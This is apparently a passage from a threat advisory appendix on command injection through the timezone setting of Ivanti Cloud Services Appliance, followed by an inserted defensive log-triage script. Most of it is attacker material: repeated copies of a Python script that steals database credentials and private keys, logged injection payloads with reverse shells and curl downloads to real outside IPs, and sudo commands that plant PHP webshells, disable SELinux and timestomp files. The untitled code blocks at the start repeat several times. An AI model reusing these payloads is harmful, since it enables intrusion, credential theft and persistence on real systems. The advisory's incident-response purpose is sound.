with open(“/opt/landesk/broker/broker.conf”) as f:
   dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]
if r:
   p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)
   os.system(“tar zxvf {}”.format(r))
   while True:
       for f in os.listdir(‘.’):
           if re.match(“phpw{6}”, f):
               os.chmod(f, 0o777)
               m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
               if m:
                   set_msg(dbpwd, “PASSWORD”, m)
                   time.sleep(30)
                   set_msg(dbpwd)
                   exit()
else:
   set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)
import os, re, base64, time
os.chdir(“/tmp”)
d = “/backups”
def set_msg(p, t=”, m=”):
   if t and m:
       msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())
   else:
       msg = ”
   os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))
try:
   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
   r = None
with open(“/opt/landesk/broker/broker.conf”) as f:
   dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]
if r:
   p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)
   os.system(“tar zxvf {}”.format(r))
   while True:
       for f in os.listdir(‘.’):
           if re.match(“phpw{6}”, f):
               os.chmod(f, 0o777)
               m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
               if m:
                   set_msg(dbpwd, “PASSWORD”, m)
                   time.sleep(30)
                   set_msg(dbpwd)
                   exit()
else:
   set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)

{
import os, re, base64, time
os.chdir(“/tmp”)
d = “/backups”
def set_msg(p, t=”, m=”):
   if t and m:
       msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())
   else:
       msg = ”
   os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’,lockoutalert=0,attempts=0 where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))

with open(“/opt/landesk/broker/broker.conf”) as f:
   dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]

   p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip()
   v = p.split(‘:’)
   k = os.popen(‘base 64 -w0 root/.certs/{}.key’.format(v[1])).read()
   set_msg(dbpwd, “PASSWORD”, p+’||’+k)
   time.sleep(30)
   set_msg(dbpwd)
}

{
import os, re, base64, time

def set_msg(p, t=”, m=”):
   if t and m:
       msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())
   else:
       msg = ”
   os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’,lockoutalert=0 where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))

os.chdir(“/tmp”)
d = “/backups”
try:
   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
   r = None
with open(“/opt/landesk/broker/broker.conf”) as f:
   dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]
   os.system(”’export PGPASSWORD={};echo “delete from user_info where runas=’Nobody'”|psql -d brokerdb -U gsbadmin”’.format(dbpwd))
   if r:
       p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)
       os.system(“tar zxvf {}”.format(r))
       while True:
           for f in os.listdir(‘.’):
               if re.match(“phpw{6}”, f):
                   os.chmod(f, 0o777)
                   m = os.popen(“./{} ‘{}’ ‘{}’ ‘{}’ root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
                   if m:
                       set_msg(dbpwd, “PASSWORD”, m)
                       time.sleep(30)
                       set_msg(dbpwd)
                       exit()
   else:
       set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)
}

{
import os, re, base64, time
os.chdir(“/tmp”)
d = “/backups”
def set_msg(p, t=”, m=”):
   if t and m:
       msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())
   else:
       msg = ”
   os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))
try:
   r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
   r = None
with open(“/opt/landesk/broker/broker.conf”) as f:
   dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read())[0]
   os.system(”’export PGPASSWORD={};echo “delete from user_info where runas=’Nobody'”|psql -d brokerdb -U gsbadmin”’.format(dbpwd))
if r:
   p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)
   os.system(“tar zxvf {}”.format(r))
   while True:
       for f in os.listdir(‘.’):
           if re.match(“phpw{6}”, f):
               os.chmod(f, 0o777)
               m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
               if m:
                   set_msg(dbpwd, “PASSWORD”, m)
                   time.sleep(30)
                   set_msg(dbpwd)
                   exit()
else:
   set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)
}

Decoded datetime.php ‘timezone’ Exploit base64 Scripts

{
Sep  5 01:09:59 REDACTED gsb[996]: /etc/php.ini
rewritten with new timezone: ‘;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d ‘=’ -f2-`;echo 
“update user_info set organization=’||/usr/bin/echo import os, re, base64, time
os.chdir(“/tmp”)
d = “/backups”
def set_msg(p, t=”, m=”):
  if t and m:
      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())
  else:
      msg = ”
  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))
try:
  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
  r = None
with open(“/opt/landesk/broker/broker.conf”) as f:
  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read
())[0]
if r:
  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)
  os.system(“tar zxvf {}”.format(r))
  while True:
      for f in os.listdir(‘.’):
          if re.match(“phpw{6}”, f):
              os.chmod(f, 0o777)
              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
              if m:
                  set_msg(dbpwd, “PASSWORD”, m)
                  time.sleep(30)
                  set_msg(dbpwd)
                  exit()
else:
  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)
| /usr/bin/base64 -d | python||’ where username=’admin'”|psql -d brokerdb -U gsbadmin;’ (1)
}
{
Sep  5 01:47:01 REDACTED gsb[2599]: /etc/php.ini
rewritten with new timezone: ‘;/usr/bin/echo 
import os, re, base64, time
os.chdir(“/tmp”)
d = “/backups”
def set_msg(p, t=”, m=”):
  if t and m:
      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())
  else:
      msg = ”
  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))
try:
  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
  r = None
with open(“/opt/landesk/broker/broker.conf”) as f:
  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read
())[0]
if r:
  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)
  os.system(“tar zxvf {}”.format(r))
  while True:
      for f in os.listdir(‘.’):
          if re.match(“phpw{6}”, f):
              os.chmod(f, 0o777)
              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
              if m:
                  set_msg(dbpwd, “PASSWORD”, m)
                  time.sleep(30)
                  set_msg(dbpwd)
                  exit()
else:
  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)  
| /usr/bin/base64 -d | python;’ (1)
}
{
Sep  5 02:14:08 REDACTED gsb[1273]: /etc/php.ini
rewritten with new timezone: ‘;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d ‘=’ -f2-`;echo 
“update user_info set organization=’||/usr/bin/echo import os, re, base64, time
os.chdir(“/tmp”)
d = “/backups”
def set_msg(p, t=”, m=”):
  if t and m:
      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())
  else:
      msg = ”
  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))
try:
  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
  r = None
with open(“/opt/landesk/broker/broker.conf”) as f:
  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read
())[0]
if r:
  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)
  os.system(“tar zxvf {}”.format(r))
  while True:
      for f in os.listdir(‘.’):
          if re.match(“phpw{6}”, f):
              os.chmod(f, 0o777)
              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
              if m:
                  set_msg(dbpwd, “PASSWORD”, m)
                  time.sleep(30)
                  set_msg(dbpwd)
                  exit()
else:
  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)
| /usr/bin/base64 -d | python||’ where username=’admin'”|psql -d brokerdb -U gsbadmin;’ (1)
}
{
Sep  5 22:22:06 REDACTED gsb[9367]: /etc/php.ini
rewritten with new timezone: ‘;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d ‘=’ -f2-`;echo 
“update user_info set organization=’||/usr/bin/echo import os, re, base64, time
os.chdir(“/tmp”)
d = “/backups”
def set_msg(p, t=”, m=”):
  if t and m:
      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())
  else:
      msg = ”
  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))
try:
  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
  r = None
with open(“/opt/landesk/broker/broker.conf”) as f:
  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read
())[0]
if r:
  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)
  os.system(“tar zxvf {}”.format(r))
  while True:
      for f in os.listdir(‘.’):
          if re.match(“phpw{6}”, f):
              os.chmod(f, 0o777)
              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
              if m:
                  set_msg(dbpwd, “PASSWORD”, m)
                  time.sleep(30)
                  set_msg(dbpwd)
                  exit()
else:
  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)
| /usr/bin/base64 -d | python||’ where username=’admin'”|psql -d brokerdb -U gsbadmin;’ (1)
}
{
Sep  6 02:39:11 REDACTED gsb[21266]: /etc/php.ini
rewritten with new timezone: ‘;/usr/bin/echo 
import os, re, base64, time
os.chdir(“/tmp”)
d = “/backups”
def set_msg(p, t=”, m=”):
  if t and m:
      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())
  else:
      msg = ”
  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))
try:
  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
  r = None
with open(“/opt/landesk/broker/broker.conf”) as f:
  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read
())[0]
if r:
  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)
  os.system(“tar zxvf {}”.format(r))
  while True:
      for f in os.listdir(‘.’):
          if re.match(“phpw{6}”, f):
              os.chmod(f, 0o777)
              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
              if m:
                  set_msg(dbpwd, “PASSWORD”, m)
                  time.sleep(30)
                  set_msg(dbpwd)
                  exit()
else:
  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)  
| /usr/bin/base64 -d | python;’ (1)
}
{
Sep  6 03:03:44 REDACTED gsb[11427]: /etc/php.ini
rewritten with new timezone: ‘;bash /tmp/Xa27efd2.tmp;’ (1)
}
{
Sep  8 05:18:35 REDACTED gsb[5132]: /etc/php.ini
rewritten with new timezone: ‘;/sbin/backuptool –backup;’ (1)
}
{
Sep  8 05:19:34 REDACTED gsb[5325]: /etc/php.ini
rewritten with new timezone: ‘;/usr/bin/echo 
import os, re, base64, time
os.chdir(“/tmp”)
d = “/backups”
def set_msg(p, t=”, m=”):
  if t and m:
      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())
  else:
      msg = ”
  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))
try:
  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
  r = None
with open(“/opt/landesk/broker/broker.conf”) as f:
  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read
())[0]
if r:
  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)
  os.system(“tar zxvf {}”.format(r))
  while True:
      for f in os.listdir(‘.’):
          if re.match(“phpw{6}”, f):
              os.chmod(f, 0o777)
              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
              if m:
                  set_msg(dbpwd, “PASSWORD”, m)
                  time.sleep(30)
                  set_msg(dbpwd)
                  exit()
else:
  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)   
| /usr/bin/base64 -d | python;’ (1)
}
{
Sep  8 10:37:35 REDACTED gsb[6196]: /etc/php.ini
rewritten with new timezone: ‘;nc REDACTED
80 -ssl -e /bin/bash;’ (1)
}
{
Sep  8 10:40:38 REDACTED gsb[8758]: /etc/php.ini
rewritten with new timezone: ‘;curl https://gggg.oyr2ohrm.eyes.sh
/;’ (1)
}
{
Sep  8 10:41:35 REDACTED gsb[7475]: /etc/php.ini
rewritten with new timezone: ‘;curl 98.98.54.209/a.sh -o /dev/shm/a.sh
;’ (1)
}
{
Sep  8 13:10:37 REDACTED gsb[22555]: /etc/php.ini
rewritten with new timezone: ‘;nc REDACTED
80 –ssl -e /bin/bash;’ (1)
}
{
Sep  8 13:21:06 REDACTED gsb[24954]: /etc/php.ini
rewritten with new timezone: ‘;nc REDACTED
80 –ssl -e /bin/bash;’ (1)
}
{
Sep  8 20:23:14 REDACTED gsb[1899]: /etc/php.ini
rewritten with new timezone: ‘;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d ‘=’ -f2-`;echo 
“update user_info set organization=’||/usr/bin/echo import os, re, base64, time
os.chdir(“/tmp”)
d = “/backups”
def set_msg(p, t=”, m=”):
  if t and m:
      msg = ‘AA{}:{}BB’.format(t, base64.b64encode(m.encode()).decode())
  else:
      msg = ”
  os.system(”’export PGPASSWORD={};echo “update user_info set organization='{}’ where username=’admin'”|psql -d brokerdb -U gsbadmin”’.format(p, msg))
try:
  r = max([os.path.join(d, f) for f in os.listdir(d) if os.path.isfile(os.path.join(d, f))], key=os.path.getmtime)
except:
  r = None
with open(“/opt/landesk/broker/broker.conf”) as f:
  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read
())[0]
if r:
  p = os.popen(“export PGPASSWORD={};echo SELECT passwd FROM user_info WHERE username=\’admin\’ | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().split(“n”)[-4].strip().split(‘:’)
  os.system(“tar zxvf {}”.format(r))
  while True:
      for f in os.listdir(‘.’):
          if re.match(“phpw{6}”, f):
              os.chmod(f, 0o777)
              m = os.popen(“./{} {} {} {} root/.certs/{}.key {}”.format(f, p[4], p[5], p[6], p[1], p[1])).read().strip()
              if m:
                  set_msg(dbpwd, “PASSWORD”, m)
                  time.sleep(30)
                  set_msg(dbpwd)
                  exit()
else:
  set_msg(dbpwd, ‘ERROR’, ‘NO BACKUP’)   
| /usr/bin/base64 -d | python||’ where username=’admin'”|psql -d brokerdb -U gsbadmin;’ (1)
}
{
Sep 10 04:36:30 REDACTED gsb[16012]: /etc/php.ini
rewritten with new timezone: ‘;/usr/bin/echo 
python -c ‘import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“45.33.101.53
“,443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(“/bin/sh”)’== | /usr/bin/base64 -d | /bin/bash;’ (1)
}
{
Sep 10 11:48:32 csa gsb[6829]: /etc/php.ini
rewritten with new timezone: ‘;/bin/
python -c ‘import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“156.234.193.18”,44345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/bash”,”-i”]);’;’ (1)
}
{
Sep 10 05:33:42 REDACTED gsb[17292]: /etc/php.ini
rewritten with new timezone: ‘;/usr/bin/echo 
import os, re, time
os.chdir(“/tmp”)
d = “/backups/backup-09-01-2024_010101.tar.gz”
with open(“/opt/landesk/broker/broker.conf”) as f:
  dbpwd = re.findall(“PGSQL_PW=(.*)”, f.read
())[0]
if os.path.exists(d):
  os.system(“tar zxf {}”.format(d))
  pwd = os.popen(“export PGPASSWORD={};echo SELECT username,passwd FROM user_info | psql -d brokerdb -U gsbadmin -h localhost”.format(dbpwd)).read().strip()
  p = pwd.split(‘:’)
  k = os.popen(“cat root/.certs/{}.0”.format(p[1])).read().strip()
  os.system(”’export PGPASSWORD={};echo “INSERT INTO blockedcerts (blockedcerts_idn, core, hash, description, created) VALUES (1, ‘{}’, ‘1’, ‘{}’, ‘2024-03-13 05:10:16.926012′)”|psql -d brokerdb -U gsbadmin”’.format(dbpwd, k[0:200], k[200:700]))
  os.system(”’export PGPASSWORD={};echo “INSERT INTO blockedcerts (blockedcerts_idn, core, hash, description, created) VALUES (2, ‘{}’, ‘2’, ‘{}’, ‘2024-03-13 05:10:16.926012′)”|psql -d brokerdb -U gsbadmin”’.format(dbpwd, k[700:900], k[900:]))
  os.system(”’export PGPASSWORD={};echo “INSERT INTO blockedcerts (blockedcerts_idn, core, hash, description, created) VALUES (3, ‘{}’, ‘3’, ‘{}’, ‘2024-03-13 05:10:16.926012′)”|psql -d brokerdb -U gsbadmin”’.format(dbpwd, pwd[0:200], pwd[200:700]))
  time.sleep(60)
  os.system(”’export PGPASSWORD={};echo “DELETE FROM blockedcerts”|psql -d brokerdb -U gsbadmin”’.format(dbpwd))
  os.system(“rm -rdf *;rm -rf *”)== | /usr/bin/base64 -d | python;’ (1)
}
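Every event above has the same shape: the CSA date/time page logs the submitted timezone value when it rewrites /etc/php.ini, so a value containing shell metacharacters is itself the injected command, and several of them stage a second script through "echo <base64> | base64 -d | python". The following triage script is an added example for defenders; it is not part of the advisory and not Ivanti code. It re-joins wrapped syslog records, flags any timezone value that is not a plain tz database name, and decodes embedded base64 stages for analysis. The sample log lines are constructed to mimic the appendix format; the host name, PIDs and the harmless base64 stage are placeholders.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import List

# A syslog record starts with "Mon DD HH:MM:SS "; anything else is a wrapped continuation.
SYSLOG_START_RE = re.compile(r"^[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d ")
# Shape of the record DateTimeTab.php writes (see the events above); "(1)" is an
# optional trailing repeat count.
EVENT_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"gsb\[(?P<pid>\d+)\]: /etc/php\.ini\s+rewritten with new timezone: "
    r"'(?P<tz>.*)'(?:\s*\(\d+\))?\s*$"
)
# A legitimate tz database name looks like "UTC", "America/New_York" or "Etc/GMT+2".
TZ_NAME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9_+\-]*(?:/[A-Za-z0-9_+\-]+)*$")
# "echo <base64> | base64 -d" staging, as used by several of the events above.
B64_STAGE_RE = re.compile(r"echo\s+([A-Za-z0-9+/=]{16,})\s*\|\s*(?:/usr/bin/)?base64\s+-d")
SHELL_META = set(";|&`$(){}<>")


@dataclass
class Finding:
    ts: str
    host: str
    pid: int
    tz_value: str
    suspicious: bool
    reasons: List[str] = field(default_factory=list)
    decoded_stages: List[str] = field(default_factory=list)


def join_records(log_text: str) -> List[str]:
    """Re-join syslog records that were wrapped onto continuation lines."""
    records: List[str] = []
    for line in log_text.splitlines():
        if SYSLOG_START_RE.match(line) or not records:
            records.append(line.rstrip())
        else:
            records[-1] += " " + line.strip()
    return records


def decode_stages(command: str) -> List[str]:
    """Decode every base64 blob that the injected command pipes into base64 -d."""
    out: List[str] = []
    for blob in B64_STAGE_RE.findall(command):
        try:
            out.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except (ValueError, UnicodeDecodeError):
            out.append("<undecodable base64>")
    return out


def triage(log_text: str) -> List[Finding]:
    """One Finding per timezone-rewrite event; flagged when the value is not a
    tz database name or carries shell metacharacters."""
    findings: List[Finding] = []
    for rec in join_records(log_text):
        m = EVENT_RE.match(rec)
        if not m:
            continue
        tz = m.group("tz")
        reasons: List[str] = []
        if not TZ_NAME_RE.match(tz):
            reasons.append("value is not a tz database name")
        meta = sorted(c for c in SHELL_META if c in tz)
        if meta:
            reasons.append("shell metacharacters: " + "".join(meta))
        stages = decode_stages(tz) if reasons else []
        if stages:
            reasons.append(f"{len(stages)} base64 stage(s) decoded")
        findings.append(Finding(m.group("ts"), m.group("host"), int(m.group("pid")),
                                tz, bool(reasons), reasons, stages))
    return findings


# Constructed sample records mimicking the appendix format. Host, PIDs and the
# base64 stage (a harmless print statement) are placeholders, not advisory data.
SAMPLE_STAGE = base64.b64encode(b"print('constructed stage marker')").decode()
SAMPLE_LOG = (
    "Jan  1 00:00:01 csa-host gsb[1001]: /etc/php.ini\n"
    "rewritten with new timezone: 'America/Chicago' (1)\n"
    "Jan  1 00:00:02 csa-host gsb[1002]: /etc/php.ini\n"
    f"rewritten with new timezone: ';/usr/bin/echo {SAMPLE_STAGE} | /usr/bin/base64 -d | python;' (1)\n"
    "Jan  1 00:00:03 csa-host gsb[1003]: /etc/php.ini\n"
    "rewritten with new timezone: ';/sbin/backuptool --backup;' (1)\n"
)

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        flag = "SUSPICIOUS" if f.suspicious else "ok"
        print(f"{f.ts} {f.host} pid={f.pid} {flag}: {f.tz_value!r} {'; '.join(f.reasons)}")
        for s in f.decoded_stages:
            print("    decoded stage:", s)
```

The tz-name allowlist is the important part: a timezone setting has a closed, well-known vocabulary, so matching against that vocabulary catches injection regardless of which payload the attacker chose, while the base64 decoding only helps with the specific staging pattern seen here.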

Appendix B: Sudo Commands

See Table 14 for a list of known sudo commands executed by the threat actors.

Table 14: Known sudo commands executed by the threat actors (Command / Use)

Command: sudo:  nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/opt/landesk/ldms/LDClient/ldpclient -i ;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d ‘=’ -f2-`;echo “update user_info set organization=’||/usr/bin/echo <base64-encoded script omitted> | /usr/bin/base64 -d | python||’ where username=’admin'”|psql -d brokerdb -U gsbadmin;
Use: Updates the “organization” field of the “admin” account in the PGSQL database with a Python script decoded from base64. The Python script decompresses the latest backup of the PGSQL database and extracts the password for the gsbadmin account to access the database.

Command: nobody : user NOT in sudoers ; TTY=unknown ; PWD=/usr/bin ; USER=root ; COMMAND=/sbin/setenforce 0
Use: Temporarily disables SELinux.

Command: sudo: admin : TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=/bin/sh -c echo REDACTED_BASE64_PASSWORD | base64 >/opt/landesk/broker/webroot/gsb/site.cnf
Use: Exfiltrates credentials and places them in a site.cnf webfile.

Command: sudo: admin : TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=/bin/sh -c echo PD9waHAgZXZhbCgkX1BPU1RbImNiNzg2OGM0NjA zNTQ4NTdiNzE5MjA0ZTI3NjZlZGJlIl0pOw== | base64 -d >/opt/landesk/broker/webroot/gsb/view.php
Use: Creates a webshell at view.php.

Command: sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/subin/tripwire –update ;/usr/bin/echo ZWNobyAiPD9waHAgc3lzdGVtKCcvYmluL3N1ZG8gJy4GqFwkX1JFUVVFU1RbJ2EnXSk7IiA+IC9vcHQvbGFuZGVzay9icm9rZXIvd2Vicm9vdC9nc2IvaGVscC5waHA= | /usr/bin/base64 -d | /bin/bash;
Use: Creates a webshell at help.php.

Command: sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i ‘s/setPhpTimeZone($TIMEZONE)/// setPhpTimeZone()/g’ /opt/landesk/broker/webroot/gsb/DateTimeTab.php
Use: Comments out the function setPhpTimeZone in DateTimeTab.php that logs the full exploit command.

Command: sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i ‘s/setSystemTimeZone( $TIMEZONE )/// setSystemTimeZone( $TIMEZONE )/g’ /opt/landesk/broker/webroot/gsb/DateTimeTab.php
Use: Comments out the vulnerable function setSystemTimeZone in DateTimeTab.php.

Command: sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i ‘s/GSB main page/GSB main pageneval($_POST[“in39112cnnpkyc1os01q34gp6r60akgi”]);/g’ /opt/landesk/broker/webroot/client/index.php
Use: Adds a webshell into index.php.

Command: sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i ‘s/$canvas_height = 600;/$canvas_height = 600;nteval($_POST[“in39112cnnpkyc1os01q34gp6r60akgi”]);/’ /opt/landesk/broker/webroot/gsb/style.php
Use: Adds a webshell into style.php.

Command: sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;touch -r /opt/landesk/broker/webroot/client/about.php /opt/landesk/broker/webroot/client/index.php
Use: Timestomping attempt to change the access and modification time of index.php.

Command: sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;touch -r /opt/landesk/broker/webroot/client/about.php /opt/landesk/broker/webroot/gsb/style.php
Use: Timestomping attempt to change the access and modification time of style.php.

Command: sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;touch -r /opt/landesk/broker/webroot/client/about.php /opt/landesk/broker/webroot/gsb/DateTimeTab.php
Use: Timestomping attempt to change the access and modification time of DateTimeTab.php.

Command: sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/gsb/help.php
Use: Timestomping attempt to change the access and modification time of help.php.

